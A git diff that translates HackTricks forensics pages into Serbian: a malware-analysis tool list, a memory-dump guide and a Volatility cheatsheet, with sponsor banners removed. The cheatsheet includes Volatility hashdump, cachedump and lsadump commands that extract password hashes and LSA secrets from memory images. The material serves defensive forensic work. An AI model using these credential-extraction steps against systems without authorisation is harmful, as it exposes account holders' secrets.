--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
@@ -1,12 +1,12 @@
-# Malware Analysis
+# Analiza Malvera
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Forensics CheatSheets
+## Forenzičke CheatSheets
 
 [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
 
-## Online Services
+## Online Usluge
 
 - [VirusTotal](https://www.virustotal.com/gui/home/upload)
 - [HybridAnalysis](https://www.hybrid-analysis.com)
@@ -14,136 +14,119 @@
 - [Intezer](https://analyze.intezer.com)
 - [Any.Run](https://any.run/)
 
-## Offline Antivirus and Detection Tools
+## Offline Antivirus i Alati za Detekciju
 
 ### Yara
 
-#### Install
-
+#### Instaliraj
 ```bash
 sudo apt-get install -y yara
 ```
+#### Pripremite pravila
 
-#### Prepare rules
-
-Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
-Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware.
-
+Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malware sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
+Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malware.
 ```bash
 wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
 mkdir rules
 python malware_yara_rules.py
 ```
-
-#### Scan
-
+#### Skeniranje
 ```bash
 yara -w malware_rules.yar image  #Scan 1 file
 yara -w malware_rules.yar folder #Scan the whole folder
 ```
+#### YaraGen: Proverite malver i kreirajte pravila
 
-#### YaraGen: Check for malware and Create rules
-
-You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
-
+Možete koristiti alat [**YaraGen**](https://github.com/Neo23x0/yarGen) za generisanje yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
 ```bash
- python3 yarGen.py --update
- python3.exe yarGen.py --excludegood -m  ../../mals/
+python3 yarGen.py --update
+python3.exe yarGen.py --excludegood -m  ../../mals/
 ```
-
 ### ClamAV
 
-#### Install
-
+#### Instaliraj
 ```
 sudo apt-get install -y clamav
 ```
-
-#### Scan
-
+#### Skeniranje
 ```bash
 sudo freshclam      #Update rules
 clamscan filepath   #Scan 1 file
 clamscan folderpath #Scan the whole folder
 ```
-
 ### [Capa](https://github.com/mandiant/capa)
 
-**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
+**Capa** otkriva potencijalno zlonamerne **mogućnosti** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari kao što su Att\&ck taktike, ili sumnjive mogućnosti kao što su:
 
-- check for OutputDebugString error
-- run as a service
-- create process
+- provera za OutputDebugString grešku
+- pokretanje kao servis
+- kreiranje procesa
 
-Get it int he [**Github repo**](https://github.com/mandiant/capa).
+Preuzmite ga u [**Github repo**](https://github.com/mandiant/capa).
 
 ### IOCs
 
-IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\
-To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
+IOC znači Indikator Kompromitacije. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovakve zlonamerne datoteke** u svojim **sistemima** i **mrežama**.\
+Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i kreira se IOC za taj malver, druge Plave ekipe mogu to koristiti da brže identifikuju malver.
 
-A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
-You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
+Alat za kreiranje ili modifikovanje IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
+Možete koristiti alate kao što su [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**.
 
 ### Loki
 
-[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
-Detection is based on four detection methods:
-
+[**Loki**](https://github.com/Neo23x0/Loki) je skener za Simple Indicators of Compromise.\
+Detekcija se zasniva na četiri metode detekcije:
 ```
 1. File Name IOC
-   Regex match on full file path/name
+Regex match on full file path/name
 
 2. Yara Rule Check
-   Yara signature matches on file data and process memory
+Yara signature matches on file data and process memory
 
 3. Hash Check
-   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
+Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
 
 4. C2 Back Connect Check
-   Compares process connection endpoints with C2 IOCs (new since version v.10)
+Compares process connection endpoints with C2 IOCs (new since version v.10)
 ```
-
 ### Linux Malware Detect
 
-[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.
+[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener za malver za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se suočavaju deljeni hostovani okruženja. Koristi podatke o pretnjama iz sistema za detekciju upada na mrežnom rubu kako bi izvukao malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama se takođe dobijaju iz korisničkih prijava putem LMD checkout funkcije i resursa zajednice za malver.
 
 ### rkhunter
 
-Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
-
+Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema na moguće **rootkitove** i malver.
 ```bash
 sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
 ```
-
 ### FLOSS
 
-[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques.
+[**FLOSS**](https://github.com/mandiant/flare-floss) je alat koji pokušava da pronađe obfuskirane stringove unutar izvršnih datoteka koristeći različite tehnike.
 
 ### PEpper
 
-[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
+[PEpper ](https://github.com/Th3Hurrican3/PEpper)proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka yara pravila).
 
 ### PEstudio
 
-[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques.
+[PEstudio](https://www.winitor.com/download) je alat koji omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe proverava virus total i pronalazi potencijalne Att\&ck tehnike.
 
 ### Detect It Easy(DiE)
 
-[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**.
+[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alat za detekciju da li je datoteka **kriptovana** i takođe pronalazi **pakere**.
 
 ### NeoPI
 
-[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
+[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)je Python skripta koja koristi razne **statističke metode** za detekciju **obfuskovanog** i **kriptovanog** sadržaja unutar tekstualnih/skript datoteka. Namena NeoPI-a je da pomogne u **detekciji skrivenog web shell koda**.
 
 ### **php-malware-finder**
 
-[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
+[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da detektuje **obfuskovani**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korišćene u **malverima**/webshell-ima.
 
 ### Apple Binary Signatures
 
-When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
-
+Kada proveravate neki **uzorak malvera**, uvek treba da **proverite potpis** binarne datoteke jer **razvijač** koji je potpisao može već biti **povezan** sa **malverom.**
 ```bash
 #Get signer
 codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@@ -154,19 +137,18 @@ codesign --verify --verbose /Applications/Safari.app
 #Check if the signature is valid
 spctl --assess --verbose /Applications/Safari.app
 ```
+## Tehnike Detekcije
 
-## Detection Techniques
+### Stacking Fajlova
 
-### File Stacking
+Ako znate da je neka fascikla koja sadrži **fajlove** web servera **poslednji put ažurirana na neki datum**. **Proverite** **datum** kada su svi **fajlovi** na **web serveru** kreirani i modifikovani i ako je neki datum **sumnjiv**, proverite taj fajl.
 
-If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
+### Osnovne Linije
 
-### Baselines
+Ako **fajlovi** u fascikli **ne bi trebali biti modifikovani**, možete izračunati **hash** **originalnih fajlova** iz fascikle i **uporediti** ih sa **trenutnim**. Sve što je modifikovano će biti **sumnjivo**.
 
-If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
+### Statistička Analiza
 
-### Statistical Analysis
-
-When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
+Kada je informacija sačuvana u logovima, možete **proveriti statistiku kao što je koliko puta je svaki fajl web servera bio pristupljen, jer bi web shell mogao biti jedan od naj**.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
index 1c8be749a..8b099d131 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -1,49 +1,37 @@
-# Memory dump analysis
+# Analiza memorijskog ispisa
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+## Početak
 
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Start
-
-Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
+Počnite **pretragu** za **malverom** unutar pcap-a. Koristite **alate** navedene u [**Analiza malvera**](../malware-analysis.md).
 
 ## [Volatility](volatility-cheatsheet.md)
 
-**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations.
+**Volatility je glavni open-source okvir za analizu memorijskih ispisa**. Ovaj Python alat analizira ispise iz spoljašnjih izvora ili VMware VM-ova, identifikujući podatke kao što su procesi i lozinke na osnovu OS profila ispisa. Proširiv je sa dodacima, što ga čini veoma svestranim za forenzičke istrage.
 
-[**Find here a cheatsheet**](volatility-cheatsheet.md)
+[**Ovde pronađite cheatsheet**](volatility-cheatsheet.md)
 
-## Mini dump crash report
+## Izveštaj o mini ispadu
 
-When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
+Kada je ispis mali (samo nekoliko KB, možda nekoliko MB), onda je verovatno reč o izveštaju o mini ispadu, a ne o memorijskom ispustu.
 
 ![](<../../../images/image (532).png>)
 
-If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
+Ako imate instaliran Visual Studio, možete otvoriti ovu datoteku i povezati neke osnovne informacije kao što su naziv procesa, arhitektura, informacije o izuzecima i moduli koji se izvršavaju:
 
 ![](<../../../images/image (263).png>)
 
-You can also load the exception and see the decompiled instructions
+Takođe možete učitati izuzetak i videti dekompilirane instrukcije
 
 ![](<../../../images/image (142).png>)
 
 ![](<../../../images/image (610).png>)
 
-Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
+U svakom slučaju, Visual Studio nije najbolji alat za izvođenje analize dubine ispisa.
 
-You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
+Trebalo bi da ga **otvorite** koristeći **IDA** ili **Radare** da biste ga pregledali u **dubini**.
 
 ​
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
index f6a63c08f..f98986240 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md
@@ -4,13 +4,8 @@
 
 ​
 
-

-
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-If you need a tool that automates memory analysis with different scan levels and runs multiple Volatility3 plugins in parallel, you can use autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/)
 
+Ako vam je potreban alat koji automatizuje analizu memorije sa različitim nivoima skeniranja i pokreće više Volatility3 dodataka paralelno, možete koristiti autoVolatility3:: [https://github.com/H3xKatana/autoVolatility3/](https://github.com/H3xKatana/autoVolatility3/)
 ```bash
 # Full scan (runs all plugins)
 python3 autovol3.py -f MEMFILE -o OUT_DIR -s full
@@ -22,66 +17,57 @@ python3 autovol3.py -f MEMFILE -o OUT_DIR -s minimal
 python3 autovol3.py -f MEMFILE -o OUT_DIR -s normal
 
 ```
-
-If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
-
+Ako želite nešto **brzo i ludo** što će pokrenuti nekoliko Volatility dodataka paralelno, možete koristiti: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility)
 ```bash
 python autoVolatility.py -f MEMFILE -d OUT_DIRECTORY -e /home/user/tools/volatility/vol.py # It will use the most important plugins (could use a lot of space depending on the size of the memory)
 ```
-
-## Installation
+## Instalacija
 
 ### volatility3
-
 ```bash
 git clone https://github.com/volatilityfoundation/volatility3.git
 cd volatility3
 python3 setup.py install
 python3 vol.py —h
 ```
-
 ### volatility2
 
 {{#tabs}}
 {{#tab name="Method1"}}
-
 ```
 Download the executable from https://www.volatilityfoundation.org/26
 ```
-
 {{#endtab}}
 
-{{#tab name="Method 2"}}
-
+{{#tab name="Metoda 2"}}
 ```bash
 git clone https://github.com/volatilityfoundation/volatility.git
 cd volatility
 python setup.py install
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-## Volatility Commands
+## Volatility komande
 
-Access the official doc in [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
+Pristupite zvaničnoj dokumentaciji u [Volatility command reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#kdbgscan)
 
-### A note on “list” vs. “scan” plugins
+### Napomena o “list” vs. “scan” pluginovima
 
-Volatility has two main approaches to plugins, which are sometimes reflected in their names. “list” plugins will try to navigate through Windows Kernel structures to retrieve information like processes (locate and walk the linked list of `_EPROCESS` structures in memory), OS handles (locating and listing the handle table, dereferencing any pointers found, etc). They more or less behave like the Windows API would if requested to, for example, list processes.
+Volatility ima dva glavna pristupa pluginovima, koji se ponekad odražavaju u njihovim imenima. “list” pluginovi će pokušati da se kreću kroz Windows Kernel strukture kako bi prikupili informacije kao što su procesi (lociranje i prolazak kroz povezanu listu `_EPROCESS` struktura u memoriji), OS handle-ovi (lociranje i listanje tabele handle-ova, dereferenciranje bilo kojih pronađenih pokazivača, itd). Oni se više-manje ponašaju kao što bi se Windows API ponašao kada bi se, na primer, tražilo da listaju procese.
 
-That makes “list” plugins pretty fast, but just as vulnerable as the Windows API to manipulation by malware. For instance, if malware uses DKOM to unlink a process from the `_EPROCESS` linked list, it won’t show up in the Task Manager and neither will it in the pslist.
+To čini “list” pluginove prilično brzim, ali jednako ranjivim na manipulaciju od strane malvera kao i Windows API. Na primer, ako malver koristi DKOM da unlinkuje proces iz `_EPROCESS` povezane liste, on se neće prikazati u Task Manager-u, niti u pslist-u.
 
-“scan” plugins, on the other hand, will take an approach similar to carving the memory for things that might make sense when dereferenced as specific structures. `psscan` for instance will read the memory and try to make`_EPROCESS` objects out of it (it uses pool-tag scanning, which is searching for 4-byte strings that indicate the presence of a structure of interest). The advantage is that it can dig up processes that have exited, and even if malware tampers with the `_EPROCESS` linked list, the plugin will still find the structure lying around in memory (since it still needs to exist for the process to run). The downfall is that “scan” plugins are a bit slower than “list” plugins, and can sometimes yield false positives (a process that exited too long ago and had parts of its structure overwritten by other operations).
+“scan” pluginovi, s druge strane, će uzeti pristup sličan vađenju podataka iz memorije za stvari koje bi mogle imati smisla kada se dereferenciraju kao specifične strukture. `psscan` na primer će čitati memoriju i pokušati da napravi `_EPROCESS` objekte iz nje (koristi skeniranje pool-tagova, što je pretraživanje za 4-bajtne stringove koji ukazuju na prisustvo strukture od interesa). Prednost je u tome što može pronaći procese koji su izašli, i čak i ako malver manipuliše `_EPROCESS` povezanim listama, plugin će i dalje pronaći strukturu koja leži u memoriji (pošto ona i dalje mora postojati da bi proces radio). Nedostatak je što su “scan” pluginovi malo sporiji od “list” pluginova, i ponekad mogu dati lažne pozitivne rezultate (proces koji je izašao previše davno i čiji su delovi strukture prepisani drugim operacijama).
 
-From: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
+Iz: [http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/](http://tomchop.me/2016/11/21/tutorial-volatility-plugins-malware-analysis/)
 
-## OS Profiles
+## OS profili
 
 ### Volatility3
 
-As explained inside the readme you need to put the **symbol table of the OS** you want to support inside _volatility3/volatility/symbols_.\
-Symbol table packs for the various operating systems are available for **download** at:
+Kao što je objašnjeno u readme-u, potrebno je staviti **tabelu simbola OS-a** koji želite da podržite unutar _volatility3/volatility/symbols_.\
+Paketi tabela simbola za različite operativne sisteme su dostupni za **preuzimanje** na:
 
 - [https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip)
 - [https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip](https://downloads.volatilityfoundation.org/volatility3/symbols/mac.zip)
@@ -89,16 +75,13 @@ Symbol table packs for the various operating systems are available for **downloa
 
 ### Volatility2
 
-#### External Profile
-
-You can get the list of supported profiles doing:
+#### Spoljni profil
 
+Možete dobiti listu podržanih profila tako što ćete uraditi:
 ```bash
 ./volatility_2.6_lin64_standalone --info | grep "Profile"
 ```
-
-If you want to use a **new profile you have downloaded** (for example a linux one) you need to create somewhere the following folder structure: _plugins/overlays/linux_ and put inside this folder the zip file containing the profile. Then, get the number of the profiles using:
-
+Ako želite da koristite **novi profil koji ste preuzeli** (na primer, linux profil), potrebno je da negde kreirate sledeću strukturu foldera: _plugins/overlays/linux_ i stavite unutar ovog foldera zip fajl koji sadrži profil. Zatim, dobijte broj profila koristeći:
 ```bash
 ./vol --plugins=/home/kali/Desktop/ctfs/final/plugins --info
 Volatility Foundation Volatility Framework 2.6
@@ -110,28 +93,22 @@ LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 - A Profile for Linux CentOS7_3.10
 VistaSP0x64                                   - A Profile for Windows Vista SP0 x64
 VistaSP0x86                                   - A Profile for Windows Vista SP0 x86
 ```
+Možete **preuzeti Linux i Mac profile** sa [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles)
 
-You can **download Linux and Mac profiles** from [https://github.com/volatilityfoundation/profiles](https://github.com/volatilityfoundation/profiles)
-
-In the previous chunk you can see that the profile is called `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, and you can use it to execute something like:
-
+U prethodnom delu možete videti da se profil zove `LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64`, i možete ga koristiti za izvršavanje nečega poput:
 ```bash
 ./vol -f file.dmp --plugins=. --profile=LinuxCentOS7_3_10_0-123_el7_x86_64_profilex64 linux_netscan
 ```
-
-#### Discover Profile
-
+#### Otkrijte profil
 ```
 volatility imageinfo -f file.dmp
 volatility kdbgscan -f file.dmp
 ```
+#### **Razlike između imageinfo i kdbgscan**
 
-#### **Differences between imageinfo and kdbgscan**
-
-[**From here**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): As opposed to imageinfo which simply provides profile suggestions, **kdbgscan** is designed to positively identify the correct profile and the correct KDBG address (if there happen to be multiple). This plugin scans for the KDBGHeader signatures linked to Volatility profiles and applies sanity checks to reduce false positives. The verbosity of the output and the number of sanity checks that can be performed depends on whether Volatility can find a DTB, so if you already know the correct profile (or if you have a profile suggestion from imageinfo), then make sure you use it from .
-
-Always take a look at the **number of processes that kdbgscan has found**. Sometimes imageinfo and kdbgscan can find **more than one** suitable **profile** but only the **valid one will have some process related** (This is because to extract processes the correct KDBG address is needed)
+[**Odavde**](https://www.andreafortuna.org/2017/06/25/volatility-my-own-cheatsheet-part-1-image-identification/): Za razliku od imageinfo koji jednostavno pruža predloge profila, **kdbgscan** je dizajniran da pozitivno identifikuje tačan profil i tačnu KDBG adresu (ako ih ima više). Ovaj plugin skenira KDBGHeader potpise povezane sa Volatility profilima i primenjuje provere ispravnosti kako bi smanjio lažne pozitivne rezultate. Opširnost izlaza i broj provera ispravnosti koje se mogu izvršiti zavise od toga da li Volatility može pronaći DTB, tako da ako već znate tačan profil (ili ako imate predlog profila iz imageinfo), obavezno ga koristite.
 
+Uvek obratite pažnju na **broj procesa koje je kdbgscan pronašao**. Ponekad imageinfo i kdbgscan mogu pronaći **više od jednog** odgovarajućeg **profila**, ali samo **važeći će imati neki povezani proces** (To je zato što je za ekstrakciju procesa potrebna tačna KDBG adresa).
 ```bash
 # GOOD
 PsActiveProcessHead           : 0xfffff800011977f0 (37 processes)
@@ -143,89 +120,68 @@ PsLoadedModuleList            : 0xfffff8000119aae0 (116 modules)
 PsActiveProcessHead           : 0xfffff800011947f0 (0 processes)
 PsLoadedModuleList            : 0xfffff80001197ac0 (0 modules)
 ```
-
 #### KDBG
 
-The **kernel debugger block**, referred to as **KDBG** by Volatility, is crucial for forensic tasks performed by Volatility and various debuggers. Identified as `KdDebuggerDataBlock` and of the type `_KDDEBUGGER_DATA64`, it contains essential references like `PsActiveProcessHead`. This specific reference points to the head of the process list, enabling the listing of all processes, which is fundamental for thorough memory analysis.
+**Kernel debugger block**, poznat kao **KDBG** u Volatility, je ključan za forenzičke zadatke koje obavlja Volatility i razni debageri. Identifikovan kao `KdDebuggerDataBlock` i tipa `_KDDEBUGGER_DATA64`, sadrži bitne reference kao što je `PsActiveProcessHead`. Ova specifična referenca ukazuje na početak liste procesa, omogućavajući prikazivanje svih procesa, što je osnovno za temeljnu analizu memorije.
 
 ## OS Information
-
 ```bash
 #vol3 has a plugin to give OS information (note that imageinfo from vol2 will give you OS info)
 ./vol.py -f file.dmp windows.info.Info
 ```
+Plugin `banners.Banners` može se koristiti u **vol3 da pokuša da pronađe linux banere** u dump-u.
 
-The plugin `banners.Banners` can be used in **vol3 to try to find linux banners** in the dump.
+## Hashovi/Lozinke
 
-## Hashes/Passwords
-
-Extract SAM hashes, [domain cached credentials](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) and [lsa secrets](../../../windows-hardening/authentication-credentials-uac-and-efs/#lsa-secrets).
+Izvucite SAM hashove, [keširane kredencijale domena](../../../windows-hardening/stealing-credentials/credentials-protections.md#cached-credentials) i [lsa tajne](../../../windows-hardening/authentication-credentials-uac-and-efs/#lsa-secrets).
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM)
 ./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry
 ./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 hashdump -f file.dmp #Grab common windows hashes (SAM+SYSTEM)
 volatility --profile=Win7SP1x86_23418 cachedump -f file.dmp #Grab domain cache hashes inside the registry
 volatility --profile=Win7SP1x86_23418 lsadump -f file.dmp #Grab lsa secrets
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## Memory Dump
 
-The memory dump of a process will **extract everything** of the current status of the process. The **procdump** module will only **extract** the **code**.
-
+Memory dump procesa će **izvući sve** iz trenutnog stanja procesa. **procdump** modul će samo **izvući** **kod**.
 ```
 volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/
 ```
+## Procesi
 
-​
+### Lista procesa
 
-

-
-​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Processes
-
-### List processes
-
-Try to find **suspicious** processes (by name) or **unexpected** child **processes** (for example a cmd.exe as a child of iexplorer.exe).\
-It could be interesting to **compare** the result of pslist with the one of psscan to identify hidden processes.
+Pokušajte da pronađete **sumnjive** procese (po imenu) ili **neočekivane** dečje **procese** (na primer, cmd.exe kao dečiji proces iexplorer.exe).\
+Može biti zanimljivo da se **uporedi** rezultat pslist-a sa onim iz psscan-a kako bi se identifikovali skriveni procesi.
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 python3 vol.py -f file.dmp windows.pstree.PsTree # Get processes tree (not hidden)
 python3 vol.py -f file.dmp windows.pslist.PsList # Get process list (EPROCESS)
 python3 vol.py -f file.dmp windows.psscan.PsScan # Get hidden process list(malware)
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden)
 volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS)
 volatility --profile=PROFILE psscan -f file.dmp # Get hidden process list(malware)
 volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
@@ -233,144 +189,120 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid  #Dump the .exe and dlls of the process in the current directory
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Command line
+### Komandna linija
 
-Anything suspicious was executed?
+Da li je izvršeno nešto sumnjivo?
 
 {{#tabs}}
 {{#tab name="vol3"}}
-
 ```bash
 python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments
 ```
-
 {{#endtab}}
 
 {{#tab name="vol2"}}
-
 ```bash
 volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments
 volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
